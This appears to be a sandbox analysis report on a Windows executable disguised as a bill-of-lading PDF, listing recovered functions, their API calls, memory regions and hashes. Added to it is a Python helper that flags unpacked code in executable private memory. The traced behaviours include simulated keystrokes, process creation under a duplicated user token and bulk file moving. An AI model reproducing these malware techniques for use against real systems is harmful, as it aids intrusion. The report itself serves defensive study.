                                                                                                                      • API String ID: 2962429428-0
                                                                                                                      • Opcode ID: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                                                                      • Instruction ID: 397672216df932ca6c22f29d52987cd2165f63c791f69eb8015935d900cfb6d9
                                                                                                                      • Opcode Fuzzy Hash: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                                                                      • Instruction Fuzzy Hash: 16E0DEB5900B019EC7318F6AE544416FBF8AEE46213248E2FD4E6D2A64D3B4A5898F54
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNELBASE(000001F4), ref: 040226B9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1754566267.0000000004020000.00000040.00000020.00020000.00000000.sdmp, Offset: 04020000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4020000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Sleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3472027048-0
                                                                                                                      • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                      • Instruction ID: 7057ed130d00774f1d6799a4ae8c0514495d476dbc1ec576ddb7ebea67de4a48
                                                                                                                      • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                      • Instruction Fuzzy Hash: 88E09A7594010DAFDB04DFA4D64969D7BB4EF05301F1005A5FD05A6680DA309E548A66
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNELBASE(000001F4), ref: 040226B9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1754566267.0000000004020000.00000040.00000020.00020000.00000000.sdmp, Offset: 04020000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4020000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Sleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3472027048-0
                                                                                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                      • Instruction ID: e5e458f030ecc53ed1883a457ecbf7a6b2ad6a0e626cdcc5ba23cfb1e2d3c3cc
                                                                                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                      • Instruction Fuzzy Hash: 8AE0E67594010DDFDB00DFF4D64D69D7BB4EF04301F1005A5FD01E2680D6309E508A62
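The two Sleep(000001F4) functions above are the only entries in this listing whose Source File is not based on a PE: the dump name encodes a PAGE_EXECUTE_READWRITE, MEM_PRIVATE region at 04020000, which is where unpacked or injected code ends up, while every other function sits in the PAGE_EXECUTE_READ, MEM_IMAGE text section of the sample at 00401000. The Python below is an added triage helper, not part of this report and not code from Joe Sandbox: it parses the "API.MODULE(args), ref: addr" lines and the "Source File" lines of blocks like the ones on this page and flags functions whose code lives in executable memory that no image backs. The positional layout assumed for the .sdmp name (base, protection, allocation protection, type) is inferred from the names on this page and is an assumption; the winnt.h constants are not. The sample input is excerpted from this page.

```python
"""Triage helper for Joe Sandbox function listings (added example, not Joe Sandbox code)."""
import re
from dataclasses import dataclass, field

# winnt.h memory constants (certain).
PAGE_NAMES = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
              0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
              0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
MEM_IMAGE = 0x1000000
TYPE_NAMES = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

# ASSUMPTION: layout of a Joe Sandbox .sdmp name, inferred from the names on this page:
#   <proc>.<iter>.<dumpid>.<base>.<protect>.<alloc protect>.<type>.<extra>.sdmp
# Only <base>, <protect> and <type> are used.
SDMP_RE = re.compile(r"\d{8}\.\d{8}\.\d+\.([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})"
                     r"\.[0-9A-Fa-f]{8}\.([0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.sdmp")
SRC_RE = re.compile(r"Source File:\s*(\S+?\.sdmp),\s*Offset:\s*([0-9A-Fa-f]+),"
                    r"\s*based on PE:\s*(true|false)")
# Matches "HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041AA46" and also
# the argument-less form "SendMessageW.USER32 ref: 0047C2FB" and "Part of subcall ..." lines.
API_RE = re.compile(r"([A-Za-z_]\w*)\.([A-Z0-9]+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)")


@dataclass
class Region:
    base: int
    protect: int
    mem_type: int
    based_on_pe: bool

    @property
    def suspicious(self) -> bool:
        # Executable memory that no PE image backs: where unpacked or injected code runs.
        return self.protect in EXECUTABLE and self.mem_type != MEM_IMAGE and not self.based_on_pe


@dataclass
class Function:
    region: Region
    apis: list = field(default_factory=list)  # (api, module, [args], ref address)


def parse_report(text: str) -> list:
    """Each function block ends with its 'Source File' line; the API lines seen since the
    previous 'APIs' heading belong to that function."""
    functions, pending = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            pending = []
            continue
        m = API_RE.search(line)
        if m:
            api, module, args, ref = m.groups()
            pending.append((api, module, [a for a in (args or "").split(",") if a], int(ref, 16)))
            continue
        m = SRC_RE.search(line)
        if m:
            name, _offset, pe = m.groups()
            s = SDMP_RE.search(name)
            if s is None:
                raise ValueError("unrecognised dump name: " + name)
            region = Region(int(s.group(1), 16), int(s.group(2), 16), int(s.group(3), 16), pe == "true")
            functions.append(Function(region, pending))
            pending = []
    return functions


def triage(text: str) -> list:
    """One record per function located in non-image executable memory, with the APIs it calls."""
    out = []
    for fn in parse_report(text):
        r = fn.region
        if r.suspicious:
            out.append({"base": hex(r.base),
                        "protect": PAGE_NAMES.get(r.protect, hex(r.protect)),
                        "type": TYPE_NAMES.get(r.mem_type, hex(r.mem_type)),
                        "apis": [a for a, _, _, _ in fn.apis]})
    return out


# Constructed input: three blocks excerpted from this report.
SAMPLE_REPORT = """
APIs
• HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041AA46
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
APIs
  • Part of subcall function 00444326: SetFilePointerEx.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,0044434E,?,?,00429A83,?,00487174,00000003,0040DFEE,?), ref: 004442F3
• WriteFile.KERNELBASE(?,?,00000001,?,00000000,?,?,00429A83,?,00487174,00000003,0040DFEE,?,?,00000001,00403843), ref: 00444362
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
APIs
• Sleep.KERNELBASE(000001F4), ref: 040226B9
Memory Dump Source
• Source File: 00000000.00000002.1754566267.0000000004020000.00000040.00000020.00020000.00000000.sdmp, Offset: 04020000, based on PE: false
"""

if __name__ == "__main__":
    for rec in triage(SAMPLE_REPORT):
        print(rec)
```

Run against the full report text, the same filter isolates every function the IDA plugin recovered from the 04020000 region, which is the unpacked stage worth dumping and scanning rather than the AutoIt runtime in the image; the 000001F4 argument is a 500 ms Sleep, consistent with the timing checks flagged in the signatures.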
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: PF$PF$"DF$$JG$&F$&F$'HG$'|G$*"D$*nF$*vG$+%F$0wE$4rE$5CG$6MG$6NF$6tE$7eF$<HF$<G$ApG$BnE$DvE$F)G$GSG$IqE$K@G$LbF$MdF$MuE$NgF$O*F$PIF$QbG$R+F$RnG$YlE$YtG$Z9G$ZPG$^[F$^oE$_7G$_?G$b"D$fH$i}G$j)F$kQG$lE$rTG$vjE$}eE$~mE$*F$.F$3G$_G$`F$mE$pE$wG
                                                                                                                      • API String ID: 0-4260964411
                                                                                                                      • Opcode ID: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                                                                      • Instruction ID: b1e67458769bbea4a86cd8903524db5b6e79558e2e7ab8c51025fc7bd56032a7
                                                                                                                      • Opcode Fuzzy Hash: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                                                                      • Instruction Fuzzy Hash: 118366F1905B409FC351DFAAF984605BAE1F3AA3157A2857FC5088B731D7B8194A8F4C
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C158
                                                                                                                      • DefDlgProcW.USER32(?,0000004E,?,?,004A83D8,?,004A83D8,?), ref: 0047C173
                                                                                                                      • GetKeyState.USER32(00000011), ref: 0047C1A4
                                                                                                                      • GetKeyState.USER32(00000009), ref: 0047C1AD
                                                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C1C0
                                                                                                                      • GetKeyState.USER32(00000010), ref: 0047C1CA
                                                                                                                      • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C1DE
                                                                                                                      • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C20A
                                                                                                                      • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C22D
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047C2D6
                                                                                                                      • SendMessageW.USER32 ref: 0047C2FB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$State$LongProcWindow
                                                                                                                      • String ID: @GUI_DRAGID$F
                                                                                                                      • API String ID: 1562745308-4164748364
                                                                                                                      • Opcode ID: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                                                                      • Instruction ID: f40edf6d5039c675f00343e7880f865f139be9e64e9b8d530a61de5f06f6045f
                                                                                                                      • Opcode Fuzzy Hash: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                                                                      • Instruction Fuzzy Hash: C6429F702042019FD714CF54C884FAB77A5EB89B04F548A6EFA48AB291DBB4EC45CB5A
APIs
• GetForegroundWindow.USER32(00000000,?,?,004448AF,?), ref: 004375B3
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004375D8
• IsIconic.USER32(?), ref: 004375E1
• ShowWindow.USER32(?,00000009,?,?,004448AF,?), ref: 004375EE
• SetForegroundWindow.USER32(?), ref: 004375FD
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00437615
• GetCurrentThreadId.KERNEL32 ref: 00437619
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00437624
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437632
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437638
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 0043763E
• SetForegroundWindow.USER32(?), ref: 00437645
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00437654
• keybd_event.USER32(00000012,00000000), ref: 0043765D
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0043766B
• keybd_event.USER32(00000012,00000000), ref: 00437674
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00437682
• keybd_event.USER32(00000012,00000000), ref: 0043768B
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00437699
• keybd_event.USER32(00000012,00000000), ref: 004376A2
• SetForegroundWindow.USER32(?), ref: 004376AD
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376CD
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D3
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
• String ID: Shell_TrayWnd
• API String ID: 3778422247-2988720461
• Opcode ID: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
• Instruction ID: 6108fbe056c1a000d5481f33e03d330ccc862392245923d3170deea12ea07584
• Opcode Fuzzy Hash: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
• Instruction Fuzzy Hash: AC31A4712803157FE6245BA59D0EF7F3F9CEB48B51F10082EFA02EA1D1DAE458009B79
APIs
• _memset.LIBCMT ref: 0044621B
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,?,?,?,?,?,?,?), ref: 00446277
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0044628A
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004462A4
• GetProcessWindowStation.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462BD
• SetProcessWindowStation.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462C8
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004462E4
• _wcslen.LIBCMT ref: 0044639E
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
• _wcsncpy.LIBCMT ref: 004463C7
• LoadUserProfileW.USERENV(?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 004463E7
• CreateEnvironmentBlock.USERENV(?,?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00446408
• CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,?,?,00000000,?), ref: 00446446
• UnloadUserProfile.USERENV(?,?,?,?,?,?,?), ref: 00446483
• CloseWindowStation.USER32(00000000,?,?,?,?), ref: 00446497
• CloseDesktop.USER32(00000000,?,?,?,?), ref: 0044649E
• SetProcessWindowStation.USER32(?,?,?,?,?), ref: 004464A9
• CloseHandle.KERNEL32(?,?,?,?,?), ref: 004464B4
• DestroyEnvironmentBlock.USERENV(?,?,?,?,?,?), ref: 004464C8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_memset_wcslen_wcsncpy
• String ID: $default$winsta0
• API String ID: 2173856841-1027155976
• Opcode ID: 8783c105518f9fa52f5c80a6299cf7ec7b6e28c011eada52347f54b488ad9e21
• Instruction ID: eafd5d154f9bcf2590b8f8eb1e0f3d39b01f77f2fd200ee1cb9c7344d9c52646
• Opcode Fuzzy Hash: 8783c105518f9fa52f5c80a6299cf7ec7b6e28c011eada52347f54b488ad9e21
• Instruction Fuzzy Hash: DD819170208341AFE724DF65C848B6FBBE8AF89744F04491DF69097291DBB8D805CB6B
APIs
• _wcslen.LIBCMT ref: 00409A61
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
• CharUpperBuffW.USER32(?,?), ref: 00409AF5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
• String ID: 0vH$4RH
• API String ID: 1143807570-2085553193
• Opcode ID: 448372cbc2a04de0c58b15acec820b8f3e335fdb8b2659cade4efb497aaa83ea
• Instruction ID: 7c8f52bff4b3ea9a641e6aac08ab5e1c8beb32691f0f21fab5f23224d73a3634
• Opcode Fuzzy Hash: 448372cbc2a04de0c58b15acec820b8f3e335fdb8b2659cade4efb497aaa83ea
• Instruction Fuzzy Hash: 34238170A043109FD724DF25D480A6BB7E1BF89304F54896EE84A9B391D739EC46CB9B
APIs
  • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe,?,C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe,004A8E80,C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe,0040F3D2), ref: 0040FFCA
  • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A45
  • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A6C
  • Part of subcall function 00436A1D: __wcsicoll.LIBCMT ref: 00436A93
  • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
• _wcscat.LIBCMT ref: 0044BD96
• _wcscat.LIBCMT ref: 0044BDBF
• __wsplitpath.LIBCMT ref: 0044BDEC
• FindFirstFileW.KERNEL32(?,?), ref: 0044BE04
• _wcscpy.LIBCMT ref: 0044BE73
• _wcscat.LIBCMT ref: 0044BE85
• _wcscat.LIBCMT ref: 0044BE97
• lstrcmpiW.KERNEL32(?,?), ref: 0044BEC3
• DeleteFileW.KERNEL32(?), ref: 0044BED5
• MoveFileW.KERNEL32(?,?), ref: 0044BEF5
• CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0C
• DeleteFileW.KERNEL32(?), ref: 0044BF17
• CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2E
• FindClose.KERNEL32(00000000), ref: 0044BF35
• MoveFileW.KERNEL32(?,?), ref: 0044BF51
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF66
• FindClose.KERNEL32(00000000), ref: 0044BF7E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
• String ID: \*.*
• API String ID: 2188072990-1173974218
• Opcode ID: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
• Instruction ID: 14f7055b3521afb04026f42b490306401b0ba37f80ed0ea0ca267746d8cc4687
• Opcode Fuzzy Hash: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
• Instruction Fuzzy Hash: CA5166B2008344AAD720DBA4DC44FDF73E8AB85314F448D1EF68982141EB79D64CCBAA
                                                                                                                      APIs
                                                                                                                      • __invoke_watson.LIBCMT ref: 004203A4
                                                                                                                        • Part of subcall function 00417D93: _memset.LIBCMT ref: 00417DBB
                                                                                                                        • Part of subcall function 00417D93: IsDebuggerPresent.KERNEL32(?,?,00000314), ref: 00417E6F
                                                                                                                        • Part of subcall function 00417D93: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000314), ref: 00417E79
                                                                                                                        • Part of subcall function 00417D93: UnhandledExceptionFilter.KERNEL32(?,?,?,00000314), ref: 00417E86
                                                                                                                        • Part of subcall function 00417D93: GetCurrentProcess.KERNEL32(C0000417,?,?,00000314), ref: 00417EA1
                                                                                                                        • Part of subcall function 00417D93: TerminateProcess.KERNEL32(00000000,?,?,00000314), ref: 00417EA8
                                                                                                                      • __get_daylight.LIBCMT ref: 004203B0
                                                                                                                      • __invoke_watson.LIBCMT ref: 004203BF
                                                                                                                      • __get_daylight.LIBCMT ref: 004203CB
                                                                                                                      • __invoke_watson.LIBCMT ref: 004203DA
                                                                                                                      • ____lc_codepage_func.LIBCMT ref: 004203E2
                                                                                                                      • _strlen.LIBCMT ref: 00420442
                                                                                                                      • __malloc_crt.LIBCMT ref: 00420449
                                                                                                                      • _strlen.LIBCMT ref: 0042045F
                                                                                                                      • _strcpy_s.LIBCMT ref: 0042046D
                                                                                                                      • __invoke_watson.LIBCMT ref: 00420482
                                                                                                                      • GetTimeZoneInformation.KERNEL32(00496C28), ref: 004204AA
                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,00496C2C,?,?,0000003F,?,?), ref: 00420528
                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,00496C80,000000FF,?,0000003F,?,?,?,00496C2C,?,?,0000003F,?,?), ref: 0042055C
                                                                                                                        • Part of subcall function 00413A88: __lock.LIBCMT ref: 00413AA6
                                                                                                                        • Part of subcall function 00413A88: ___sbh_find_block.LIBCMT ref: 00413AB1
                                                                                                                        • Part of subcall function 00413A88: ___sbh_free_block.LIBCMT ref: 00413AC0
                                                                                                                        • Part of subcall function 00413A88: RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
                                                                                                                        • Part of subcall function 00413A88: GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                                                                                                                      • __invoke_watson.LIBCMT ref: 004205CC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __invoke_watson$ByteCharExceptionFilterMultiProcessUnhandledWide__get_daylight_strlen$CurrentDebuggerErrorFreeHeapInformationLastPresentTerminateTimeZone____lc_codepage_func___sbh_find_block___sbh_free_block__lock__malloc_crt_memset_strcpy_s
                                                                                                                      • String ID: S\
                                                                                                                      • API String ID: 4084823496-393906132
                                                                                                                      • Opcode ID: dc5610741a0148f7786b6b9dfa96f50a6ae589fbdbcd52e429fe3139d0279a48
                                                                                                                      • Instruction ID: b357f19af7064e56bcdb8625987f67de7edc2332d57e558cb2e7b84f91b73af7
                                                                                                                      • Opcode Fuzzy Hash: dc5610741a0148f7786b6b9dfa96f50a6ae589fbdbcd52e429fe3139d0279a48
                                                                                                                      • Instruction Fuzzy Hash: 6A91D371E00125AFDB20EF65EC819AE7BE9EF55300B95003BF540A7253DA3C89828F5C
                                                                                                                      APIs
                                                                                                                      • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00434D75
                                                                                                                      • __swprintf.LIBCMT ref: 00434D91
                                                                                                                      • _wcslen.LIBCMT ref: 00434D9B
                                                                                                                      • _wcslen.LIBCMT ref: 00434DB0
                                                                                                                      • _wcslen.LIBCMT ref: 00434DC5
                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00434DD7
                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00434E0A
                                                                                                                      • _memset.LIBCMT ref: 00434E27
                                                                                                                      • _wcslen.LIBCMT ref: 00434E3C
                                                                                                                      • _wcsncpy.LIBCMT ref: 00434E6F
                                                                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00434EA9
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00434EB4
                                                                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 00434EBB
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00434ECE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcslen$CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                      • String ID: :$\$\??\%s
                                                                                                                      • API String ID: 302090198-3457252023
                                                                                                                      • Opcode ID: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
